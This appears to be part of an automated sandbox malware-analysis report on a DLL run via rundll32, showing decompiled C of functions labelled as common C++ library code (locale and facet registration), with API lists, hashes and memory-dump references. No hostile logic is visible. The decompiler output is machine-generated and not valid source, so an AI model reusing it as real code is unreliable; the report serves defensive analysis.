																			 *((intOrPtr*)( *((intOrPtr*)( *_t434 + 4))))();
																			 *0x6e2c6ddc = _t434;
																			goto L33;
																		}
																	} else {
																		_t434 = _t445;
																		goto L33;
																	}
																}
															} else {
																_t433 =  *(_t462 - 0x10);
																 *(_t462 - 0x10) = _t433;
																 *(_t462 - 4) = 1;
																E6E206FD3(__eflags, _t433);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t433 + 4))))();
																 *0x6e2c6db0 = _t433;
																goto L26;
															}
														} else {
															_t433 = _t444;
															goto L26;
														}
													}
												} else {
													_t432 =  *(_t462 - 0x10);
													 *(_t462 - 0x10) = _t432;
													 *(_t462 - 4) = 1;
													E6E206FD3(__eflags, _t432);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t432 + 4))))();
													 *0x6e2c6dd8 = _t432;
													goto L19;
												}
											} else {
												_t432 = _t443;
												goto L19;
											}
										}
									} else {
										_t431 =  *(_t462 - 0x10);
										 *(_t462 - 0x10) = _t431;
										 *(_t462 - 4) = 1;
										E6E206FD3(__eflags, _t431);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t431 + 4))))();
										 *0x6e2c6dc4 = _t431;
										goto L12;
									}
								} else {
									_t431 = _t442;
									goto L12;
								}
							}
						} else {
							_t430 =  *(_t462 - 0x10);
							 *(_t462 - 0x10) = _t430;
							 *(_t462 - 4) = 1;
							E6E206FD3(__eflags, _t430);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t430 + 4))))();
							 *0x6e2c6dc8 = _t430;
							goto L5;
						}
					} else {
						_t430 = _t441;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E20F6BA
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F6C4
int.LIBCPMT ref: 6E20F6DB

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

moneypunct.LIBCPMT ref: 6E20F6FE
std::_Facet_Register.LIBCPMT ref: 6E20F715
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F735
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F753

Strings

|m,n, xrefs: 6E20F6CF

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: |m,n
API String ID: 113178234-3550068666
Opcode ID: 5737e51470b673c70df31574f447d02579a6ecdc7575a850be95af8181142fe4
Instruction ID: fd568e27bc1ff9b3a391e1cd033205c842be542f981569738765c01386a0c0e3
Opcode Fuzzy Hash: 5737e51470b673c70df31574f447d02579a6ecdc7575a850be95af8181142fe4
Instruction Fuzzy Hash: F311CA7595051D9FCF01DBD4C894AEEB77BBF44714F240908E4106B2D0DB749A85C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F759, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E6E20F759(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t139;
				signed int _t140;
				void* _t152;
				void* _t165;
				void* _t178;
				void* _t191;
				void* _t204;
				void* _t217;
				void* _t230;
				void* _t243;
				signed int _t359;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				void* _t418;

				_t387 = __edx;
				_t296 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t418 - 0x14, 0);
				_t399 =  *0x6e2c6dc4; // 0x0
				 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
				 *(_t418 - 0x10) = _t399;
				_t139 = E6E1E161C(0x6e2c6d78);
				_t299 =  *((intOrPtr*)(_t418 + 8));
				_t140 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t139);
				_t389 = _t140;
				if(_t140 != 0) {
					L5:
					E6E2066BA(_t418 - 0x14);
					return E6E220075(_t389);
				} else {
					if(_t399 == 0) {
						_push( *((intOrPtr*)(_t418 + 8)));
						_push(_t418 - 0x10);
						__eflags = E6E2112B4(__ebx, _t299, __edx, _t389, _t399) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t418 - 0x20);
							E6E223D74(_t418 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t389, _t399, 0x14);
							E6E206653(_t418 - 0x14, 0);
							_t400 =  *0x6e2c6dd8; // 0x0
							 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
							 *(_t418 - 0x10) = _t400;
							_t152 = E6E1E161C(0x6e2c6d84);
							_t306 =  *((intOrPtr*)(_t418 + 8));
							_t390 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t152);
							__eflags = _t390;
							if(_t390 != 0) {
								L12:
								E6E2066BA(_t418 - 0x14);
								return E6E220075(_t390);
							} else {
								__eflags = _t400;
								if(_t400 == 0) {
									_push( *((intOrPtr*)(_t418 + 8)));
									_push(_t418 - 0x10);
									__eflags = E6E211339(_t296, _t306, __edx, _t390, _t400) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t418 - 0x20);
										E6E223D74(_t418 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t296, _t390, _t400, 0x14);
										E6E206653(_t418 - 0x14, 0);
										_t401 =  *0x6e2c6db0; // 0x0
										 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
										 *(_t418 - 0x10) = _t401;
										_t165 = E6E1E161C(0x6e2c6d64);
										_t313 =  *((intOrPtr*)(_t418 + 8));
										_t391 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t165);
										__eflags = _t391;
										if(_t391 != 0) {
											L19:
											E6E2066BA(_t418 - 0x14);
											return E6E220075(_t391);
										} else {
											__eflags = _t401;
											if(_t401 == 0) {
												_push( *((intOrPtr*)(_t418 + 8)));
												_push(_t418 - 0x10);
												__eflags = E6E2113A1(_t296, _t313, __edx, _t391, _t401) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t418 - 0x20);
													E6E223D74(_t418 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t296, _t391, _t401, 0x14);
													E6E206653(_t418 - 0x14, 0);
													_t402 =  *0x6e2c6ddc; // 0x0
													 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
													 *(_t418 - 0x10) = _t402;
													_t178 = E6E1E161C(0x6e2c6d88);
													_t320 =  *((intOrPtr*)(_t418 + 8));
													_t392 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t178);
													__eflags = _t392;
													if(_t392 != 0) {
														L26:
														E6E2066BA(_t418 - 0x14);
														return E6E220075(_t392);
													} else {
														__eflags = _t402;
														if(_t402 == 0) {
															_push( *((intOrPtr*)(_t418 + 8)));
															_push(_t418 - 0x10);
															__eflags = E6E211409(_t296, _t320, _t387, _t392, _t402) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t418 - 0x20);
																E6E223D74(_t418 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t296, _t392, _t402, 0x14);
																E6E206653(_t418 - 0x14, 0);
																_t403 =  *0x6e2c6de0; // 0x0
																 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																 *(_t418 - 0x10) = _t403;
																_t191 = E6E1E161C(0x6e2c6d8c);
																_t327 =  *((intOrPtr*)(_t418 + 8));
																_t393 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t191);
																__eflags = _t393;
																if(_t393 != 0) {
																	L33:
																	E6E2066BA(_t418 - 0x14);
																	return E6E220075(_t393);
																} else {
																	__eflags = _t403;
																	if(_t403 == 0) {
																		_push( *((intOrPtr*)(_t418 + 8)));
																		_push(_t418 - 0x10);
																		__eflags = E6E211471(_t296, _t327, _t387, _t393, _t403) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t418 - 0x20);
																			E6E223D74(_t418 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t296, _t393, _t403, 0x14);
																			E6E206653(_t418 - 0x14, 0);
																			_t404 =  *0x6e2c6dfc; // 0x0
																			 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																			 *(_t418 - 0x10) = _t404;
																			_t204 = E6E1E161C(0x6e2c6da8);
																			_t334 =  *((intOrPtr*)(_t418 + 8));
																			_t394 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t204);
																			__eflags = _t394;
																			if(_t394 != 0) {
																				L40:
																				E6E2066BA(_t418 - 0x14);
																				return E6E220075(_t394);
																			} else {
																				__eflags = _t404;
																				if(_t404 == 0) {
																					_push( *((intOrPtr*)(_t418 + 8)));
																					_push(_t418 - 0x10);
																					__eflags = E6E2114EC(_t296, _t334, _t387, _t394, _t404) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t418 - 0x20);
																						E6E223D74(_t418 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t296, _t394, _t404, 0x14);
																						E6E206653(_t418 - 0x14, 0);
																						_t405 =  *0x6e2c6dcc; // 0x0
																						 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																						 *(_t418 - 0x10) = _t405;
																						_t217 = E6E1E161C(0x6e2c6d80);
																						_t341 =  *((intOrPtr*)(_t418 + 8));
																						_t395 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t217);
																						__eflags = _t395;
																						if(_t395 != 0) {
																							L47:
																							E6E2066BA(_t418 - 0x14);
																							return E6E220075(_t395);
																						} else {
																							__eflags = _t405;
																							if(_t405 == 0) {
																								_push( *((intOrPtr*)(_t418 + 8)));
																								_push(_t418 - 0x10);
																								__eflags = E6E211558(_t296, _t341, _t387, _t395, _t405) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t418 - 0x20);
																									E6E223D74(_t418 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t296, _t395, _t405, 0x14);
																									E6E206653(_t418 - 0x14, 0);
																									_t406 =  *0x6e2c6e00; // 0x0
																									 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																									 *(_t418 - 0x10) = _t406;
																									_t230 = E6E1E161C(0x6e2c6dac);
																									_t348 =  *((intOrPtr*)(_t418 + 8));
																									_t396 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t230);
																									__eflags = _t396;
																									if(_t396 != 0) {
																										L54:
																										E6E2066BA(_t418 - 0x14);
																										return E6E220075(_t396);
																									} else {
																										__eflags = _t406;
																										if(_t406 == 0) {
																											_push( *((intOrPtr*)(_t418 + 8)));
																											_push(_t418 - 0x10);
																											__eflags = E6E2115C4(_t296, _t348, _t387, _t396, _t406) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t418 - 0x20);
																												E6E223D74(_t418 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t296, _t396, _t406, 0x14);
																												E6E206653(_t418 - 0x14, 0);
																												_t407 =  *0x6e2c6dd0; // 0x0
																												 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																												 *(_t418 - 0x10) = _t407;
																												_t243 = E6E1E161C(0x6e2c6d60);
																												_t355 =  *((intOrPtr*)(_t418 + 8));
																												_t397 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t243);
																												__eflags = _t397;
																												if(_t397 != 0) {
																													L61:
																													E6E2066BA(_t418 - 0x14);
																													return E6E220075(_t397);
																												} else {
																													__eflags = _t407;
																													if(_t407 == 0) {
																														_push( *((intOrPtr*)(_t418 + 8)));
																														_push(_t418 - 0x10);
																														__eflags = E6E21162A(_t296, _t355, _t387, _t397, _t407) - 0xffffffff;
																														if(__eflags == 0) {
																															_t359 = _t418 - 0x20;
																															E6E1E1438(_t359);
																															E6E223D74(_t418 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e26851f, _t296, _t397, _t407, 4);
																															_t408 = _t359;
																															 *(_t418 - 0x10) = _t408;
																															 *((intOrPtr*)(_t408 + 4)) =  *((intOrPtr*)(_t418 + 0xc));
																															_push( *((intOrPtr*)(_t418 + 0x14)));
																															_t133 = _t418 - 4;
																															 *_t133 =  *(_t418 - 4) & 0x00000000;
																															__eflags =  *_t133;
																															 *_t408 = 0x6e26c0c4;
																															 *((char*)(_t408 + 0x28)) =  *((intOrPtr*)(_t418 + 0x10));
																															E6E21542F(_t296, _t359, _t387, _t397, _t408,  *_t133);
																															return E6E220075(_t408,  *((intOrPtr*)(_t418 + 8)));
																														} else {
																															_t397 =  *(_t418 - 0x10);
																															 *(_t418 - 0x10) = _t397;
																															 *(_t418 - 4) = 1;
																															E6E206FD3(__eflags, _t397);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t397 + 4))))();
																															 *0x6e2c6dd0 = _t397;
																															goto L61;
																														}
																													} else {
																														_t397 = _t407;
																														goto L61;
																													}
																												}
																											} else {
																												_t396 =  *(_t418 - 0x10);
																												 *(_t418 - 0x10) = _t396;
																												 *(_t418 - 4) = 1;
																												E6E206FD3(__eflags, _t396);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t396 + 4))))();
																												 *0x6e2c6e00 = _t396;
																												goto L54;
																											}
																										} else {
																											_t396 = _t406;
																											goto L54;
																										}
																									}
																								} else {
																									_t395 =  *(_t418 - 0x10);
																									 *(_t418 - 0x10) = _t395;
																									 *(_t418 - 4) = 1;
																									E6E206FD3(__eflags, _t395);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t395 + 4))))();
																									 *0x6e2c6dcc = _t395;
																									goto L47;
																								}
																							} else {
																								_t395 = _t405;
																								goto L47;
																							}
																						}
																					} else {
																						_t394 =  *(_t418 - 0x10);
																						 *(_t418 - 0x10) = _t394;
																						 *(_t418 - 4) = 1;
																						E6E206FD3(__eflags, _t394);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t394 + 4))))();
																						 *0x6e2c6dfc = _t394;
																						goto L40;
																					}
																				} else {
																					_t394 = _t404;
																					goto L40;
																				}
																			}
																		} else {
																			_t393 =  *(_t418 - 0x10);
																			 *(_t418 - 0x10) = _t393;
																			 *(_t418 - 4) = 1;
																			E6E206FD3(__eflags, _t393);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t393 + 4))))();
																			 *0x6e2c6de0 = _t393;
																			goto L33;
																		}
																	} else {
																		_t393 = _t403;
																		goto L33;
																	}
																}
															} else {
																_t392 =  *(_t418 - 0x10);
																 *(_t418 - 0x10) = _t392;
																 *(_t418 - 4) = 1;
																E6E206FD3(__eflags, _t392);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t392 + 4))))();
																 *0x6e2c6ddc = _t392;
																goto L26;
															}
														} else {
															_t392 = _t402;
															goto L26;
														}
													}
												} else {
													_t391 =  *(_t418 - 0x10);
													 *(_t418 - 0x10) = _t391;
													 *(_t418 - 4) = 1;
													E6E206FD3(__eflags, _t391);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t391 + 4))))();
													 *0x6e2c6db0 = _t391;
													goto L19;
												}
											} else {
												_t391 = _t401;
												goto L19;
											}
										}
									} else {
										_t390 =  *(_t418 - 0x10);
										 *(_t418 - 0x10) = _t390;
										 *(_t418 - 4) = 1;
										E6E206FD3(__eflags, _t390);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t390 + 4))))();
										 *0x6e2c6dd8 = _t390;
										goto L12;
									}
								} else {
									_t390 = _t400;
									goto L12;
								}
							}
						} else {
							_t389 =  *(_t418 - 0x10);
							 *(_t418 - 0x10) = _t389;
							 *(_t418 - 4) = 1;
							E6E206FD3(__eflags, _t389);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t389 + 4))))();
							 *0x6e2c6dc4 = _t389;
							goto L5;
						}
					} else {
						_t389 = _t399;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E20F760
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F76A
int.LIBCPMT ref: 6E20F781

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

moneypunct.LIBCPMT ref: 6E20F7A4
std::_Facet_Register.LIBCPMT ref: 6E20F7BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F7DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F7F9

Strings

xm,n, xrefs: 6E20F775

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: xm,n
API String ID: 113178234-1559963885
Opcode ID: ac68a556dcb167d71a36b1fe2792b94f77d70aa96ddf60b19f2c1d4de0dc03d9
Instruction ID: 8004293cadcf95e0c9dcf2b7f552294a58c66b67e777e9209cd1033daeb19f73
Opcode Fuzzy Hash: ac68a556dcb167d71a36b1fe2792b94f77d70aa96ddf60b19f2c1d4de0dc03d9
Instruction Fuzzy Hash: C211067A90051D9BCF01DBE0C898AEEB7BBAF44715F240908E410AB3D0DB749A44C792

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F229, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E20F229(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t251;
				signed int _t252;
				void* _t264;
				void* _t277;
				void* _t290;
				void* _t303;
				void* _t316;
				void* _t329;
				void* _t342;
				void* _t355;
				void* _t368;
				void* _t381;
				void* _t394;
				void* _t407;
				void* _t420;
				void* _t433;
				void* _t446;
				void* _t459;
				signed int _t663;
				signed int _t718;
				signed int _t719;
				signed int _t720;
				signed int _t721;
				signed int _t722;
				signed int _t723;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				void* _t770;

				_t715 = __edx;
				_t544 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t770 - 0x14, 0);
				_t735 =  *0x6e2c6db8; // 0x0
				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
				 *(_t770 - 0x10) = _t735;
				_t251 = E6E1E161C(0x6e2c6d6c);
				_t547 =  *((intOrPtr*)(_t770 + 8));
				_t252 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t251);
				_t717 = _t252;
				if(_t252 != 0) {
					L5:
					E6E2066BA(_t770 - 0x14);
					return E6E220075(_t717);
				} else {
					if(_t735 == 0) {
						_push( *((intOrPtr*)(_t770 + 8)));
						_push(_t770 - 0x10);
						__eflags = E6E210F1F(__ebx, _t547, __edx, _t717, _t735) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t770 - 0x20);
							E6E223D74(_t770 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t717, _t735, 0x14);
							E6E206653(_t770 - 0x14, 0);
							_t736 =  *0x6e2c6dec; // 0x0
							 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
							 *(_t770 - 0x10) = _t736;
							_t264 = E6E1E161C(0x6e2c6d98);
							_t554 =  *((intOrPtr*)(_t770 + 8));
							_t718 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t264);
							__eflags = _t718;
							if(_t718 != 0) {
								L12:
								E6E2066BA(_t770 - 0x14);
								return E6E220075(_t718);
							} else {
								__eflags = _t736;
								if(_t736 == 0) {
									_push( *((intOrPtr*)(_t770 + 8)));
									_push(_t770 - 0x10);
									__eflags = E6E210F87(_t544, _t554, __edx, _t718, _t736) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t770 - 0x20);
										E6E223D74(_t770 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t544, _t718, _t736, 0x14);
										E6E206653(_t770 - 0x14, 0);
										_t737 =  *0x6e2c6dbc; // 0x0
										 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
										 *(_t770 - 0x10) = _t737;
										_t277 = E6E1E161C(0x6e2c6d70);
										_t561 =  *((intOrPtr*)(_t770 + 8));
										_t719 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t277);
										__eflags = _t719;
										if(_t719 != 0) {
											L19:
											E6E2066BA(_t770 - 0x14);
											return E6E220075(_t719);
										} else {
											__eflags = _t737;
											if(_t737 == 0) {
												_push( *((intOrPtr*)(_t770 + 8)));
												_push(_t770 - 0x10);
												__eflags = E6E210FEF(_t544, _t561, __edx, _t719, _t737) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t770 - 0x20);
													E6E223D74(_t770 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t544, _t719, _t737, 0x14);
													E6E206653(_t770 - 0x14, 0);
													_t738 =  *0x6e2c6df0; // 0x0
													 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
													 *(_t770 - 0x10) = _t738;
													_t290 = E6E1E161C(0x6e2c6d9c);
													_t568 =  *((intOrPtr*)(_t770 + 8));
													_t720 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t290);
													__eflags = _t720;
													if(_t720 != 0) {
														L26:
														E6E2066BA(_t770 - 0x14);
														return E6E220075(_t720);
													} else {
														__eflags = _t738;
														if(_t738 == 0) {
															_push( *((intOrPtr*)(_t770 + 8)));
															_push(_t770 - 0x10);
															__eflags = E6E211057(_t544, _t568, _t715, _t720, _t738) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t770 - 0x20);
																E6E223D74(_t770 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t544, _t720, _t738, 0x14);
																E6E206653(_t770 - 0x14, 0);
																_t739 =  *0x6e2c6dc0; // 0x0
																 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																 *(_t770 - 0x10) = _t739;
																_t303 = E6E1E161C(0x6e2c6d74);
																_t575 =  *((intOrPtr*)(_t770 + 8));
																_t721 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t303);
																__eflags = _t721;
																if(_t721 != 0) {
																	L33:
																	E6E2066BA(_t770 - 0x14);
																	return E6E220075(_t721);
																} else {
																	__eflags = _t739;
																	if(_t739 == 0) {
																		_push( *((intOrPtr*)(_t770 + 8)));
																		_push(_t770 - 0x10);
																		__eflags = E6E2110BF(_t544, _t575, _t715, _t721, _t739) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t770 - 0x20);
																			E6E223D74(_t770 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t544, _t721, _t739, 0x14);
																			E6E206653(_t770 - 0x14, 0);
																			_t740 =  *0x6e2c6df8; // 0x0
																			 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																			 *(_t770 - 0x10) = _t740;
																			_t316 = E6E1E161C(0x6e2c6da4);
																			_t582 =  *((intOrPtr*)(_t770 + 8));
																			_t722 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t316);
																			__eflags = _t722;
																			if(_t722 != 0) {
																				L40:
																				E6E2066BA(_t770 - 0x14);
																				return E6E220075(_t722);
																			} else {
																				__eflags = _t740;
																				if(_t740 == 0) {
																					_push( *((intOrPtr*)(_t770 + 8)));
																					_push(_t770 - 0x10);
																					__eflags = E6E211127(_t544, _t582, _t715, _t722, _t740) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t770 - 0x20);
																						E6E223D74(_t770 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t544, _t722, _t740, 0x14);
																						E6E206653(_t770 - 0x14, 0);
																						_t741 =  *0x6e2c6df4; // 0x0
																						 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																						 *(_t770 - 0x10) = _t741;
																						_t329 = E6E1E161C(0x6e2c6da0);
																						_t589 =  *((intOrPtr*)(_t770 + 8));
																						_t723 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t329);
																						__eflags = _t723;
																						if(_t723 != 0) {
																							L47:
																							E6E2066BA(_t770 - 0x14);
																							return E6E220075(_t723);
																						} else {
																							__eflags = _t741;
																							if(_t741 == 0) {
																								_push( *((intOrPtr*)(_t770 + 8)));
																								_push(_t770 - 0x10);
																								__eflags = E6E2111AB(_t544, _t589, _t715, _t723, _t741) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t770 - 0x20);
																									E6E223D74(_t770 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t544, _t723, _t741, 0x14);
																									E6E206653(_t770 - 0x14, 0);
																									_t742 =  *0x6e2c6dc8; // 0x0
																									 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																									 *(_t770 - 0x10) = _t742;
																									_t342 = E6E1E161C(0x6e2c6d7c);
																									_t596 =  *((intOrPtr*)(_t770 + 8));
																									_t724 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t342);
																									__eflags = _t724;
																									if(_t724 != 0) {
																										L54:
																										E6E2066BA(_t770 - 0x14);
																										return E6E220075(_t724);
																									} else {
																										__eflags = _t742;
																										if(_t742 == 0) {
																											_push( *((intOrPtr*)(_t770 + 8)));
																											_push(_t770 - 0x10);
																											__eflags = E6E211230(_t544, _t596, _t715, _t724, _t742) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t770 - 0x20);
																												E6E223D74(_t770 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t544, _t724, _t742, 0x14);
																												E6E206653(_t770 - 0x14, 0);
																												_t743 =  *0x6e2c6dc4; // 0x0
																												 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																												 *(_t770 - 0x10) = _t743;
																												_t355 = E6E1E161C(0x6e2c6d78);
																												_t603 =  *((intOrPtr*)(_t770 + 8));
																												_t725 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t355);
																												__eflags = _t725;
																												if(_t725 != 0) {
																													L61:
																													E6E2066BA(_t770 - 0x14);
																													return E6E220075(_t725);
																												} else {
																													__eflags = _t743;
																													if(_t743 == 0) {
																														_push( *((intOrPtr*)(_t770 + 8)));
																														_push(_t770 - 0x10);
																														__eflags = E6E2112B4(_t544, _t603, _t715, _t725, _t743) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t770 - 0x20);
																															E6E223D74(_t770 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t544, _t725, _t743, 0x14);
																															E6E206653(_t770 - 0x14, 0);
																															_t744 =  *0x6e2c6dd8; // 0x0
																															 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																															 *(_t770 - 0x10) = _t744;
																															_t368 = E6E1E161C(0x6e2c6d84);
																															_t610 =  *((intOrPtr*)(_t770 + 8));
																															_t726 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t368);
																															__eflags = _t726;
																															if(_t726 != 0) {
																																L68:
																																E6E2066BA(_t770 - 0x14);
																																return E6E220075(_t726);
																															} else {
																																__eflags = _t744;
																																if(_t744 == 0) {
																																	_push( *((intOrPtr*)(_t770 + 8)));
																																	_push(_t770 - 0x10);
